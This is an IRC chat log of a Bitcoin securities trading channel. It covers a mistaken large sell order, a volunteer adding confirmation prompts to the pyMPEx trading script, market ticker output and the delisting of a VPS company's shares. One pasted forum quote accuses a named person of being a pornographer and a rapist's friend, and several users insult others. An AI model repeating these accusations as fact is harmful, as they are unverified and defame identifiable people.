16:49:54 I just realized the massive dump after it was me missing a zero Jan 16 16:50:02 fml Jan 16 16:50:17 at least it was only 100,000 shares Jan 16 16:50:31 well seems to be trading higher now anyways Jan 16 16:50:34 you spooked the market Jan 16 16:50:42 you can sell them at a profit Jan 16 16:50:57 no Jan 16 16:50:59 I sold them Jan 16 16:51:08 sell 100000 @ 90000 Jan 16 16:51:12 oops Jan 16 16:51:20 oh! Jan 16 16:51:21 lol Jan 16 16:51:24 And I thought you were one of the crazy people buying everything up until they have a monopoly and then selling for insane prices Jan 16 16:51:53 [MPEX] [S.DICE] 53 @ 0.0052 = 0.2756 BTC [+] Jan 16 16:53:09 Bugpowder: you were the dump? Jan 16 16:53:43 jurov: do you still use BitVps? They should just run openstack like rackspace and become BitCloud Jan 16 16:53:50 yup Jan 16 16:54:04 !ticker m s.dice Jan 16 16:54:05 [MPEX:S.DICE] 1D: 0.00454703 / 0.00474916 / 0.0052 (1101638 shares, 5,231.86 BTC), 7D: 0.00449034 / 0.00469447 / 0.0052 (2759747 shares, 12,955.57 BTC), 30D: 0.0014 / 0.00370156 / 0.0052 (12598574 shares, 46,634.50 BTC) Jan 16 16:54:15 you didn't drop the average price though Jan 16 16:54:20 !ticker m s.bvps Jan 16 16:54:22 [MPEX:S.BVPS] 1D: 0.00635539 / 0.00635539 / 0.00635539 (156 shares, 0.99 BTC), 7D: 0.00635539 / 0.00635539 / 0.00635541 (196 shares, 1.25 BTC), 30D: 0.00200003 / 0.00337645 / 0.00635541 (13429 shares, 45.34 BTC) Jan 16 16:54:47 ;;calc 100000*.00474916-.004557 Jan 16 16:54:47 474.911443 Jan 16 16:54:59 ;;calc 100000*(.00474916-.004557) Jan 16 16:54:59 19.216 Jan 16 16:55:09 damn how do you have so many btc in the system? Jan 16 16:55:16 ;;calc 100000*(.0051-.004557) Jan 16 16:55:16 54.3 Jan 16 16:55:25 Yah, about at 30-40BTC loss Jan 16 16:55:32 stupid Jan 16 16:55:35 you bought the at .0051? Jan 16 16:55:43 if I were to buy back Jan 16 16:55:46 that is what I would have to pay Jan 16 16:56:00 lol Jan 16 16:56:01 if anyone was actually selling Jan 16 16:56:21 gotta stop trading while distracted with a baby Jan 16 16:56:24 those shares probably closed a short Jan 16 16:56:31 what was the gain from when you bouht them Jan 16 16:56:35 those were pre ipo non? Jan 16 16:56:40 ya Jan 16 16:57:14 I'm like... damn that is weird price action following a big buy... Jan 16 16:57:26 heh Jan 16 16:57:27 log in, check stat. Jan 16 16:57:29 o fuk Jan 16 16:57:42 you must have a bunch of BTC now though Jan 16 16:57:46 invest in something else Jan 16 16:58:02 I think I just need to turn it off for a while Jan 16 16:58:20 no you can keep buying Jan 16 16:58:23 heh cold wallet Jan 16 17:00:30 Bugpowder, time to fund development of a usable mpex desktop app, no? Jan 16 17:01:01 pympex is fine Jan 16 17:01:04 like Jan 16 17:01:16 It's not like this shit doesnt happen everyday Jan 16 17:01:22 on bloomberg terminals Jan 16 17:02:14 pympex does not show you "btc total" Jan 16 17:02:19 yeah Jan 16 17:02:29 that would perhaps have alerted you Jan 16 17:02:30 a confirmation step would be great actually Jan 16 17:02:45 who wants to make it? Jan 16 17:02:48 5BTC Jan 16 17:02:51 bounty! Jan 16 17:03:27 anything thats an order of magnitude out of the expected range should throw a big warning :p Jan 16 17:07:22 Well if anyone that bought shares in that dump would like to sell them back to me for a reasonable profit, I have thrown up some bids :-) Jan 16 17:11:35 [MPEX] [S.DICE] 1752 @ 0.00477623 = 8.368 BTC [-] Jan 16 17:12:08 [HAVELOCK] [SDICE] 19 @ 0.48 = 9.12 BTC [-] Jan 16 17:12:20 Actually, it would be trivial to add a sanity check to the pyMPEX script. Jan 16 17:12:24 I think I will do that. Jan 16 17:14:03 [HAVELOCK] [KCIM] 1 @ 0.95 BTC [+] Jan 16 17:19:27 Bugpowder, I'll do it in a while. Jan 16 17:19:48 [MPEX] [S.DICE] 432 @ 0.00474004 = 2.0477 BTC [-] Jan 16 17:19:50 [MPEX] [S.DICE] 890 @ 0.00474 = 4.2186 BTC [-] Jan 16 17:23:07 This might be my first down day in USD terms since Dec 23rd Jan 16 17:23:35 heh Jan 16 17:24:07 I bet that buyout of the 48 wall happend when a mini-whale was on a losing streak Jan 16 17:24:33 I think S.DICE is destined to go up until Erik puts another IPO wall up Jan 16 17:24:42 the passthrus buy shares Jan 16 17:24:48 but they never sell them Jan 16 17:25:06 slowly removing avabilable shares from MPEX Jan 16 17:25:12 driving prices up Jan 16 17:25:21 Bugpowder: is dice profits static? Jan 16 17:25:29 ? Jan 16 17:25:47 dice expected profits is 1.9% of bet volume Jan 16 17:25:50 fixed Jan 16 17:25:54 can sdice lose money? Jan 16 17:26:08 sdice never pays a negative dividend Jan 16 17:26:26 but the dividends will go in a whole Jan 16 17:26:28 in a hole Jan 16 17:26:34 if there was negative return in a month Jan 16 17:27:10 like the month the mpoe bot was subjected to inside trading Jan 16 17:27:15 dividend is calculated based on total profits since last payout. no payout if no dividend Jan 16 17:27:19 and bondholders lost money Jan 16 17:27:23 no payout if no profit Jan 16 17:27:46 right Jan 16 17:28:14 dice is like the btc version of a lottery then Jan 16 17:28:23 if it is always expected to profit Jan 16 17:28:42 thestringpuller: hwo do you know it's not happening every day? (inside trading) Jan 16 17:29:27 mpoe lost more than the combined profits of mpbor Jan 16 17:29:38 in the month of august Jan 16 17:29:52 examine your ignore list EskimoBob :) Jan 16 17:31:34 mpoe is a really strange name Jan 16 17:33:26 lol Jan 16 17:34:03 good morning Jan 16 17:37:00 i hope everyone is having a lovely day Jan 16 17:40:27 lol, it's 80f here Jan 16 17:40:38 i'm in shorts and a teeshirt Jan 16 17:40:51 cold front on the way Jan 16 17:40:54 -12C but will be -28C on weekend Jan 16 17:40:57 heat pump onthe fritz Jan 16 17:41:05 uh oh Jan 16 17:41:12 working from home Jan 16 17:41:17 ;;ticker Jan 16 17:41:18 BTCUSD ticker | Best bid: 14.45001, Best ask: 14.47999, Bid-ask spread: 0.02998, Last trade: 14.47999, 24 hour volume: 38390.50736602, 24 hour low: 14.15850, 24 hour high: 14.51000, 24 hour vwap: 14.35733 Jan 16 17:41:20 waiting on the repairman Jan 16 17:41:23 booya Jan 16 17:41:28 compressor sounds like seized motor Jan 16 17:41:29 14.51 Jan 16 17:41:45 high-side of compessor is burning to touch Jan 16 17:41:56 [MPEX] [S.DICE] 9590 @ 0.00474 = 45.4566 BTC [-] Jan 16 17:42:00 gigavps does it ever get cold their Jan 16 17:42:03 *there Jan 16 17:42:16 i've never been to florida in the winter iirc Jan 16 17:42:27 it got into the 50s a couple weeks ago Jan 16 17:42:41 but i could go swimming on a day like today Jan 16 17:42:47 sucks because most of my bad weather comes from that direction Jan 16 17:42:58 cold front, warm front Jan 16 17:43:03 rinse and repeat Jan 16 17:43:11 lol, like hurricanes Jan 16 17:43:16 [MPEX] [S.DICE] 432 @ 0.00474637 = 2.0504 BTC [+] Jan 16 17:43:18 [MPEX] [S.DICE] 2550 @ 0.00474639 = 12.1033 BTC [+] Jan 16 17:43:22 EskimoBob that is redonkulous Jan 16 17:43:35 no wonder you have Eskimo in your handle Jan 16 17:43:49 fairbanks? Jan 16 17:43:51 and here i thought you were being cheeky Jan 16 17:45:40 crossover point Jan 16 17:45:44 so you are not in fairbanks Jan 16 17:45:53 you are in some nice a mild climate compared to there Jan 16 17:46:35 Bugpowder you talkin to me? Jan 16 17:46:42 no Jan 16 17:46:45 eskino Jan 16 17:47:05 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Jan 16 17:48:19 gigavps you are probably poolside Jan 16 17:49:53 close Jan 16 17:51:30 Nikki Beach Jan 16 17:57:17 [MPEX] [S.DICE] 3400 @ 0.00482168 = 16.3937 BTC [+] Jan 16 18:05:03 [MPEX] [S.DICE] 18 @ 0.00475777 = 0.0856 BTC [-] Jan 16 18:05:14 [MPEX] [S.DICE] 432 @ 0.00474004 = 2.0477 BTC [-] Jan 16 18:05:16 [MPEX] [S.DICE] 450 @ 0.00474 = 2.133 BTC [-] Jan 16 18:06:43 [MPEX] [S.DICE] 432 @ 0.00475788 = 2.0554 BTC [+] Jan 16 18:06:49 [MPEX] [S.DICE] 1500 @ 0.00475792 = 7.1369 BTC [+] Jan 16 18:19:08 [MPEX] [S.DICE] 1300 @ 0.00482168 = 6.2682 BTC [+] Jan 16 18:19:20 [MPEX] [S.DICE] 1624 @ 0.00482656 = 7.8383 BTC [+] Jan 16 18:20:14 [MPEX] [O.BTCUSD.P150T] 100 @ 0.0975 = 9.75 BTC [-] Jan 16 18:20:55 jurov: I canceled on of my coinbr orders, its status is 'manual' with the btc not credited yet, what's up with that? Jan 16 18:22:41 Schadenfreude, looking into that... Jan 16 18:29:14 manual? did you read it? :P j/k Jan 16 18:32:07 [MPEX] [S.DICE] 68 @ 0.00475797 = 0.3235 BTC [-] Jan 16 18:32:09 [MPEX] [S.DICE] 652 @ 0.00475237 = 3.0985 BTC [-] Jan 16 18:32:10 [MPEX] [S.DICE] 530 @ 0.00474 = 2.5122 BTC [-] Jan 16 18:35:43 [MPEX] [S.DICE] 301 @ 0.00482656 = 1.4528 BTC [+] Jan 16 18:35:45 [MPEX] [S.DICE] 1841 @ 0.00484562 = 8.9208 BTC [+] Jan 16 18:38:18 'manual' means there's snafu and admin should fix it (we get a notification, too) Jan 16 18:39:24 sometimes that monkey we have here for matching mpex orders just gives up :P Jan 16 18:41:11 ;;ticker Jan 16 18:41:12 BTCUSD ticker | Best bid: 14.51471, Best ask: 14.54000, Bid-ask spread: 0.02529, Last trade: 14.54000, 24 hour volume: 37409.22540529, 24 hour low: 14.15850, 24 hour high: 14.54000, 24 hour vwap: 14.37244 Jan 16 18:42:07 15.545 Jan 16 18:42:11 14.545 Jan 16 18:46:42 [MPEX] [S.DICE] 525 @ 0.00478213 = 2.5106 BTC [-] Jan 16 18:52:18 Bugpowder, https://github.com/jurov/pyMPEx Jan 16 18:52:52 very quick version, it asks confirmation for all commands, with BUY/SELL/WITHDRAW shows also BTC amount Jan 16 18:53:24 sweet. I will incorporate into my version Jan 16 18:53:51 ;;ticker Jan 16 18:53:52 BTCUSD ticker | Best bid: 14.52202, Best ask: 14.59900, Bid-ask spread: 0.07698, Last trade: 14.59900, 24 hour volume: 38173.79747892, 24 hour low: 14.15850, 24 hour high: 14.59900, 24 hour vwap: 14.37755 Jan 16 18:54:10 here comes 14.72 Jan 16 19:05:24 !!! Jan 16 19:05:32 http://blog.smickles.com/wp-content/uploads/2013/01/SAS-in-good-standing.png Jan 16 19:16:06 smickles: you still around i got your email Jan 16 19:17:03 thestringpuller: yes, i'm here. I'll be filing for licenses soon :D Jan 16 19:17:15 sweer Jan 16 19:17:29 can i use your business services soon?!? :) Jan 16 19:17:46 added few more goodies to pimpex - option to use gpg- agent, option to disable prompt Jan 16 19:19:18 thestringpuller: yes, I believe I can legally begin doing business once I get a city business license :D Jan 16 19:19:21 [MPEX] [S.MPOE] 5000 @ 0.00065412 = 3.2706 BTC [+] Jan 16 19:19:22 [MPEX] [S.MPOE] 1000 @ 0.00065413 = 0.6541 BTC [+] Jan 16 19:19:24 [MPEX] [S.MPOE] 3800 @ 0.00065414 = 2.4857 BTC [+] Jan 16 19:22:37 Bugpowder, is it okay? my addy: 1D7JQMhZ3R1uqpcwkSH7RmradQLNZHUuSV Jan 16 19:26:38 [MPEX] [S.DICE] 432 @ 0.00474002 = 2.0477 BTC [-] Jan 16 19:26:44 [MPEX] [S.DICE] 2400 @ 0.00474001 = 11.376 BTC [-] Jan 16 19:26:45 [MPEX] [S.DICE] 368 @ 0.00474 = 1.7443 BTC [-] Jan 16 19:30:12 [MPEX] [S.MPOE] 12186 @ 0.00065135 = 7.9374 BTC [-] Jan 16 19:30:14 [MPEX] [S.MPOE] 11564 @ 0.00064635 = 7.4744 BTC [-] Jan 16 19:35:05 [BTCTC] [BASIC-MINING] 6 @ 0.33 = 1.98 BTC [+] Jan 16 19:41:03 [MPEX] [S.DICE] 432 @ 0.00474968 = 2.0519 BTC [+] Jan 16 19:41:05 [MPEX] [S.DICE] 1568 @ 0.00474971 = 7.4475 BTC [+] Jan 16 19:41:42 [MPEX] [S.MPOE] 16219 @ 0.00064635 = 10.4832 BTC [-] Jan 16 19:45:10 "Merchant shipping in the 1600's was quite profitable you could make 300% on your investment..._if_...the boat came back..." - OH in lecture today. Jan 16 19:50:49 [MPEX] [S.DICE] 2250 @ 0.00474971 = 10.6868 BTC [+] Jan 16 19:54:39 [MPEX] [S.MPOE] 21050 @ 0.00065414 = 13.7696 BTC [+] Jan 16 19:54:41 [MPEX] [S.MPOE] 15708 @ 0.00065438 = 10.279 BTC [+] Jan 16 19:54:46 [MPEX] [S.MPOE] 3242 @ 0.00066181 = 2.1456 BTC [+] Jan 16 20:02:13 [MPEX] [S.DICE] 3094 @ 0.00474971 = 14.6956 BTC [+] Jan 16 20:02:15 [MPEX] [S.DICE] 1225 @ 0.00476367 = 5.8355 BTC [+] Jan 16 20:13:04 [HAVELOCK] [SDICE] 5 @ 0.48 = 2.4 BTC [-] Jan 16 20:18:23 [MPEX] [S.DICE] 259 @ 0.00484562 = 1.255 BTC [+] Jan 16 20:18:25 [MPEX] [S.DICE] 1050 @ 0.00485855 = 5.1015 BTC [+] Jan 16 20:21:19 [MPEX] [S.DICE] 589 @ 0.00489624 = 2.8839 BTC [+] Jan 16 20:24:23 [BTCTC] [SYNERGY] 5 @ 0.17 = 0.85 BTC [+] Jan 16 20:24:36 okay, it's now quite complete: https://github.com/jurov/pyMPEx Jan 16 20:24:58 added gpg-agent support and rudimentary logging Jan 16 20:25:19 what is gpg-agent? Jan 16 20:25:49 it remembers the gpg password for you Jan 16 20:25:56 so you don't have to type it every time Jan 16 20:26:11 [MPEX] [S.DICE] 3561 @ 0.0047584 = 16.9447 BTC [-] Jan 16 20:26:21 yessss Jan 16 20:26:47 what's your bitcoin address? Jan 16 20:27:12 1D7JQMhZ3R1uqpcwkSH7RmradQLNZHUuSV Jan 16 20:27:52 what did i miss Jan 16 20:28:31 heh Jan 16 20:29:46 pimped up pympex Jan 16 20:31:02 [MPEX] [S.DICE] 600 @ 0.00494808 = 2.9688 BTC [+] Jan 16 20:31:04 [MPEX] [S.DICE] 976 @ 0.00494809 = 4.8293 BTC [+] Jan 16 20:31:43 s.dice askwall gone Jan 16 20:31:49 fuck... and no one port it to Windows Jan 16 20:31:54 fatfingered a dump of s.dice Jan 16 20:31:57 to port it* Jan 16 20:32:07 jurov fixed pympex so I don't do that again Jan 16 20:32:16 BTC hit 14.689 Jan 16 20:34:43 Azelphur: https://github.com/Azelphur/pyMPEx/pull/3 Jan 16 20:35:03 oO, things Jan 16 20:37:55 Bugpowder, didn't you say 5BTC? Jan 16 20:38:27 yah i sent another Jan 16 20:38:38 ;;rated Bugpowder Jan 16 20:38:39 You have not yet rated user Bugpowder Jan 16 20:38:57 ;;rate Bugpowder 1 funded pyMPEx development Jan 16 20:38:58 Rating entry successful. Your rating of 1 for user Bugpowder has been recorded. Jan 16 20:39:46 tx Jan 16 20:40:10 jurov: oh hey cool, you've added support for using the agent so people don' thave to type the password every time Jan 16 20:40:13 didn't know the library supported that :D Jan 16 20:41:28 have merged it Jan 16 20:43:20 thx :) Jan 16 20:43:21 [MPEX] [S.DICE] 2050 @ 0.00490557 = 10.0564 BTC [-] Jan 16 20:43:22 [MPEX] [S.DICE] 150 @ 0.0048777 = 0.7317 BTC [-] Jan 16 20:45:46 [MPEX] [S.DICE] 1800 @ 0.0048777 = 8.7799 BTC [-] Jan 16 20:45:53 [MPEX] [S.DICE] 200 @ 0.00486436 = 0.9729 BTC [-] Jan 16 20:46:05 [HAVELOCK] [KCIM] 9 @ 0.95 = 8.55 BTC [+] Jan 16 20:48:08 quick, someone send a test email to smickles@smickles.com Jan 16 20:48:37 [MPEX] [S.DICE] 1424 @ 0.00494809 = 7.0461 BTC [+] Jan 16 20:48:38 [MPEX] [S.DICE] 576 @ 0.0049481 = 2.8501 BTC [+] Jan 16 20:49:28 argh, I can't get that damn thing ported to windows or python on windows either Jan 16 20:49:46 smickles sent Jan 16 20:50:30 I can't get python gpg specifically. Says python installation is not found in registry Jan 16 20:50:43 yet I've installed it =/ Jan 16 20:51:13 kakobrekla: thanks, it worked :D Jan 16 20:52:09 Execute 'WITHDRAW|test|5000000000', 5E+1BTC (y/n)? lol the formatting needs some fix Jan 16 20:53:08 Namworld it's official, VPS has its first Teraminer Jan 16 20:53:16 wut? Jan 16 20:53:19 oh Jan 16 20:53:21 signup Jan 16 20:53:23 not cip Jan 16 20:53:24 chiup Jan 16 20:53:26 chip Jan 16 20:53:30 right? Jan 16 20:53:37 huh Jan 16 20:53:50 you have a teramining rig? Jan 16 20:53:58 or a teramining investor? Jan 16 20:54:02 no rigs yet Jan 16 20:54:15 first official upgrade Jan 16 20:54:39 according to the new contract / terms Jan 16 20:55:19 [MPEX] [S.DICE] 2700 @ 0.00490863 = 13.2533 BTC [-] Jan 16 20:55:30 jurov, works great! Jan 16 20:55:34 thanks again. Jan 16 20:56:17 stoked about the autologger Jan 16 20:56:24 [MPEX] [S.DICE] 3450 @ 0.0049481 = 17.0709 BTC [+] Jan 16 21:04:09 [MPEX] [S.DICE] 2200 @ 0.00486436 = 10.7016 BTC [-] Jan 16 21:04:15 [MPEX] [S.DICE] 401 @ 0.0048577 = 1.9479 BTC [-] Jan 16 21:05:42 [MPEX] [S.DICE] 72 @ 0.0049481 = 0.3563 BTC [+] Jan 16 21:05:44 [MPEX] [S.DICE] 3078 @ 0.00496329 = 15.277 BTC [+] Jan 16 21:06:03 [MPEX] [S.DICE] 2633 @ 0.00496329 = 13.0683 BTC [+] Jan 16 21:06:09 [MPEX] [S.DICE] 2240 @ 0.00497373 = 11.1412 BTC [+] Jan 16 21:06:11 [MPEX] [S.DICE] 1000 @ 0.00498008 = 4.9801 BTC [+] Jan 16 21:06:12 [MPEX] [S.DICE] 1100 @ 0.00498009 = 5.4781 BTC [+] Jan 16 21:06:14 [MPEX] [S.DICE] 60 @ 0.00499 = 0.2994 BTC [+] Jan 16 21:08:04 [HAVELOCK] [KCIM] 21 @ 0.95 = 19.95 BTC [+] Jan 16 21:09:59 pushed fix for these pesky decimals, you can apply if you want Jan 16 21:10:36 perhaps floats would be enough for this. but i'm used to avoid them like plague :D Jan 16 21:10:48 got my heat fixed Jan 16 21:10:51 like a boss Jan 16 21:12:03 jcpham, how? got milk? Jan 16 21:12:11 fuck... Jan 16 21:12:28 damn python gpg doesn't want to install... wtf Jan 16 21:16:19 RRRAAAAHHH Jan 16 21:18:29 ok, pyMPEx is just unusable on Windows Jan 16 21:20:03 try the perl one :D Jan 16 21:21:39 does it have the same features? Jan 16 21:22:18 and why would perl work anyway Jan 16 21:23:48 never tried it and looks likethe link is dead... mod6, you around? Jan 16 21:24:37 maybe someone should get angry and write it straight in C/C++ ... Jan 16 21:24:52 the only truly multiplatform lang Jan 16 21:30:28 yeah... Jan 16 21:31:36 I can't import installed modules on windows... Jan 16 21:31:43 when using python scripts Jan 16 21:33:35 which one? Jan 16 21:36:33 EskimoBob: G.SDICE should trade at a 5% discount to S.DICE Jan 16 21:37:50 ;;calc .00499*.95 Jan 16 21:37:50 0.0047405 Jan 16 21:38:34 so if there is a way to move it form deadterra to mpex, prolly for a fee Jan 16 21:40:02 ;;calc .004705 - (.00044) Jan 16 21:40:04 0.004265 Jan 16 21:40:40 i feel like it's fairly well spot on at bitfunder if deadterra were to charge a 1% fee to transfer out of the passthru Jan 16 21:41:30 one sec Jan 16 21:41:39 you mean just tis last one? Jan 16 21:43:05 about 0.0000344 per share if i'm doing it correctly Jan 16 21:43:48 1.72e-06 Jan 16 21:44:20 oh wait, i think i was off my a digit Jan 16 21:45:33 1720~ paid to 10000000 shares Jan 16 21:45:39 ;;calc 1720/10000000 Jan 16 21:45:40 0.000172 Jan 16 21:46:01 8.6e-06 Jan 16 21:51:20 mommy he's an angry eskimo! Jan 16 21:57:20 Seems like you're not happy about S.BVPS being delisted? Jan 16 21:57:30 is anyone happy about that? Jan 16 21:57:37 No Jan 16 21:57:41 hrm Jan 16 21:57:51 why was it delisted Jan 16 21:57:55 Well maybe my partners Jan 16 21:58:04 Cool! Jan 16 21:58:18 Multiple breaches of contract Jan 16 21:58:26 Is what caused it to be delisted. Jan 16 21:58:36 EskimoBob, seems everything that is crap you own a few shares. Jan 16 21:59:08 can someone link me to the original contract Jan 16 21:59:16 To start with, lack of financial statements I suppose. Then rg selling his interest in BitVPS Jan 16 21:59:16 i suspected this might happen tbh Jan 16 21:59:30 http://mpex.co/?mpsic=S.BVPS Jan 16 21:59:36 It's still there for now... Jan 16 21:59:36 i haven't read the contract in many months Jan 16 21:59:43 it doesnt change Jan 16 22:00:29 I don't see why everyone would be fucked... or how halting trades would change anything. Jan 16 22:01:24 so you do not like mircea_popescu Jan 16 22:01:28 i get that Jan 16 22:01:59 but he likes nefario or smth :> Jan 16 22:02:30 A list of key+shares will be given to rg Jan 16 22:02:58 He can pass that to us and we'll take care of it from then on. Jan 16 22:03:46 Give it to me Jan 16 22:04:20 rg is gone, he just gave BitVPS away to me, arij and phungus Jan 16 22:04:44 But we still talk a bit with him from time to time. Jan 16 22:05:24 because it is profitable Jan 16 22:05:29 *isn't Jan 16 22:06:35 It isn't his agreement to honor Jan 16 22:06:53 We might just do that or relist. Or both, depending on what each holder wants. Jan 16 22:07:03 Buyback some, relist the rest. Jan 16 22:07:16 i'm glad you are taking care of it Namworld Jan 16 22:07:23 i'd like to see bitvps succeed Jan 16 22:07:26 I'll have to be discuss with arij & phungus Jan 16 22:07:36 I'll have to discuss* Jan 16 22:07:44 I'll make an announcement for now. Jan 16 22:08:41 ... no Jan 16 22:08:58 S.DICE is on there Jan 16 22:10:23 eh, but I like S.DICE Jan 16 22:10:26 You forget that the pornographer Mircea Popescu is friend with the rapist, check before posting. Jan 16 22:10:35 ^ these forum quotes are harsh man Jan 16 22:10:57 yeah Jan 16 22:12:49 true sory Jan 16 22:12:55 No, it's the Rap eGhost... Jan 16 22:13:20 it's also a robot chicken referece if you are unfamiliar Jan 16 22:13:23 Okay, it's whatever you want it to be then Jan 16 22:13:26 check the youtubes Jan 16 22:14:15 or a friendly eskimo with tourettes Jan 16 22:14:49 ohhai buffer Jan 16 22:16:43 Should be. Jan 16 22:17:26 Plus since everyone using MPEx already use gpg, signing to confirm their key shouldn't be a problem either Jan 16 22:17:44 I think possibly alcoholic eskimo Jan 16 22:19:02 methskimo even Jan 16 22:20:34 its a little sad tbh Jan 16 22:21:39 all that quality usagi trolling, now he's regressed into a rambling paranoid old lunatic barking at traffic Jan 16 22:29:12 [MPEX] [S.DICE] 500 @ 0.00503208 = 2.516 BTC [+] Jan 16 22:33:17 [MPEX] [S.DICE] 200 @ 0.00503208 = 1.0064 BTC [+] Jan 16 22:33:19 [MPEX] [S.DICE] 1700 @ 0.00503209 = 8.5546 BTC [+] Jan 16 22:35:04 0.00479246666667 Jan 16 22:35:08 ah the age old classic 'i know you are you said you are' touche Jan 16 22:37:04 [MPEX] [S.DICE] 645 @ 0.00500542 = 3.2285 BTC [-] Jan 16 22:39:22 [MPEX] [S.DICE] 522 @ 0.00503209 = 2.6268 BTC [+] Jan 16 22:39:28 [MPEX] [S.DICE] 1000 @ 0.00505291 = 5.0529 BTC [+] Jan 16 22:39:30 [MPEX] [S.DICE] 1428 @ 0.0050749 = 7.247 BTC [+] Jan 16 22:40:42 [BTCTC] [SYNERGY] 5 @ 0.17 = 0.85 BTC [+] Jan 16 22:46:52 heh micon is like a slightly smarter version of EskimoBob Jan 16 22:47:57 dub i wouldn't give micon so much credit Jan 16 22:53:02 [MPEX] [S.DICE] 1353 @ 0.0050205 = 6.7927 BTC [-] Jan 16 22:54:09 heh https://bitcointalk.org/index.php?topic=136842.0 Jan 16 22:54:14 ahh, what's new ? Jan 16 22:54:30 ciuciu is apparently waiting for pirate to pay out before he refunds his 'investors' Jan 16 22:55:28 sweet lol Jan 16 22:56:30 EskimoBob, seems everything that is crap you own a few shares. << virtuaally lol Jan 16 22:57:31 i'm glad you are taking care of it Namworld << to his credit he did buy a bunch of shares while they were trying to acquire. Jan 16 22:58:03 [MPEX] [S.DICE] 3272 @ 0.0050749 = 16.6051 BTC [+] Jan 16 22:58:05 [MPEX] [S.DICE] 278 @ 0.00509359 = 1.416 BTC [+] Jan 16 22:59:23 [MPEX] [S.DICE] 5622 @ 0.00509359 = 28.6362 BTC [+] Jan 16 22:59:28 [MPEX] [S.DICE] 1282 @ 0.00510357 = 6.5428 BTC [+] Jan 16 22:59:30 [MPEX] [S.DICE] 1000 @ 0.00512318 = 5.1232 BTC [+] Jan 16 22:59:36 [MPEX] [S.DICE] 947 @ 0.00512319 = 4.8517 BTC [+] Jan 16 22:59:38 [MPEX] [S.DICE] 450 @ 0.0051247 = 2.3061 BTC [+] Jan 16 22:59:53 [MPEX] [S.DICE] 699 @ 0.0051655 = 3.6107 BTC [+] Jan 16 23:00:00 it seems to me the new bitvps owners are at least attempting to rectify the situation Jan 16 23:00:10 although contractually i'd say they have none Jan 16 23:00:28 [MPEX] [S.DICE] 50 @ 0.0051655 = 0.2583 BTC [+] Jan 16 23:00:30 [MPEX] [S.DICE] 1899 @ 0.00517905 = 9.835 BTC [+] Jan 16 23:00:31 [MPEX] [S.DICE] 451 @ 0.00519571 = 2.3433 BTC [+] Jan 16 23:01:28 or my non-professional opinion is that rg's name is on the contract Jan 16 23:01:34 sdice asks = empty Jan 16 23:03:50 !ticker s.dice Jan 16 23:03:51 Provide exchange and ticker. Jan 16 23:03:54 !ticker m s.dice Jan 16 23:03:59 [MPEX:S.DICE] 1D: 0.00454703 / 0.00476762 / 0.0052 (1079068 shares, 5,144.59 BTC), 7D: 0.00449034 / 0.00470128 / 0.0052 (2783896 shares, 13,087.89 BTC), 30D: 0.0014 / 0.00371882 / 0.0052 (11843686 shares, 44,044.55 BTC) Jan 16 23:04:29 teh whoa. Jan 16 23:04:39 jcpham, how exactly do they attempt? Jan 16 23:05:06 namworld came here only after i got to #bitvps and told them their PR is fail Jan 16 23:05:28 if they are considering or entertaining the idea Jan 16 23:05:37 that's close to an attempt Jan 16 23:05:37 i seriously suspect they're completely inept in this Jan 16 23:05:45 i see Jan 16 23:06:05 they probably need help tbh Jan 16 23:06:52 jurov i don't imagine they really groked the complexities of running a public company going in Jan 16 23:07:21 i mentioned it some time ago Jan 16 23:07:26 the complications at least Jan 16 23:07:31 [MPEX] [S.DICE] 3000 @ 0.00516915 = 15.5075 BTC [-] Jan 16 23:07:40 specifically the mpex contract Jan 16 23:08:14 i honestly thought that the listing is probably bvps' largest asset. there is such a thing as a reverse ipo for instance. Jan 16 23:08:38 yeah its free advertising Jan 16 23:08:50 I new something was wrong when they delayed the divvy Jan 16 23:08:55 bailed Jan 16 23:09:09 i do not know the particulars but it does no one is doing the accounting Jan 16 23:09:12 Bugpowder actually the 14th extra dividend was in fact acquisition cash payment as per the contract Jan 16 23:09:17 yeah Jan 16 23:09:18 which never got signed 0.0 Jan 16 23:09:20 in which case mircea_popescu really should delist Jan 16 23:09:28 *does seem Jan 16 23:09:41 I ment the 09-12-12 divvy Jan 16 23:09:44 which was late Jan 16 23:09:46 o that. ya Jan 16 23:09:48 this isn't te real world Jan 16 23:09:58 started thinking... hmm... isn't this a company run by a 22 year old Jan 16 23:10:00 i mean i get it that you want it to be Jan 16 23:10:06 maybe I should move to the bluechips Jan 16 23:10:08 it would be great if it were Jan 16 23:10:29 no please teach me Jan 16 23:10:32 the problem here is that you never really know what to do. i mean, if you insta-wipe any company that's late with divs/misses a report date you will end up causing a lot of grief for legitimate shareholders Jan 16 23:10:47 if you don't, there's always going to be this lead-up string. first it misses X. then a little more. then a little more still. Jan 16 23:11:14 mircea_popescu, that would be a sign of a failing company, no? Jan 16 23:11:21 i never actually used the word imaginary... Jan 16 23:11:24 nyRednek or of someone who fell and broke a leg. Jan 16 23:11:36 [MPEX] [S.DICE] 99 @ 0.00519571 = 0.5144 BTC [+] Jan 16 23:12:11 mircea_popescu, either way, if the asset was lagging in that manner, it doesn't seem like a sound investment Jan 16 23:12:19 i agree. Jan 16 23:12:28 also the server downtime Jan 16 23:12:31 bad sign Jan 16 23:12:35 for a vps co Jan 16 23:12:37 mircea_popescu, at least not until it catches up and starts posting prompt reports Jan 16 23:12:38 which opens up another can of worms : it was a realtively small asset (3k mkt cap or so) Jan 16 23:12:43 to be down for over a day Jan 16 23:12:43 small assets are a lot more prone to neglect. Jan 16 23:12:54 not allowing them creates this very unfair field for many people. Jan 16 23:12:57 what to do, what to do. Jan 16 23:12:57 wait, we can buy securities here? Jan 16 23:13:09 Bugpowder yes, that. for sure. Jan 16 23:13:46 NYSE doesn't list pink sheets Jan 16 23:13:59 !help Jan 16 23:14:00 List of commands: Jan 16 23:14:01 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Jan 16 23:14:15 let bitfunder do the OTTBB style companies Jan 16 23:14:48 personally I wouldnt touch a vps/hosting startup with EskimoBob's Jan 16 23:14:57 nothing to be made in that market Jan 16 23:15:39 Buglouse in april there wasn;t someone like mpex to create a downmarket for the half dozen or so smaller exchanges Jan 16 23:15:43 consequently, they didn't really exist. Jan 16 23:15:55 but yes, i am creating the solutions, just, it's a little slow. Jan 16 23:16:01 bah i mean Bugpowder Jan 16 23:16:23 take a look at WHT, the margins are tiny Jan 16 23:16:53 dub i agree it's a tough racket. Jan 16 23:17:08 sure accepting bitcoin is somethign different but just stick a bitpay checkout on any of the thousands of reseller options Jan 16 23:17:09 but i don't think it's really the exchange's job to do that sort of filtering. Jan 16 23:17:14 [MPEX] [S.MPOE] 3350 @ 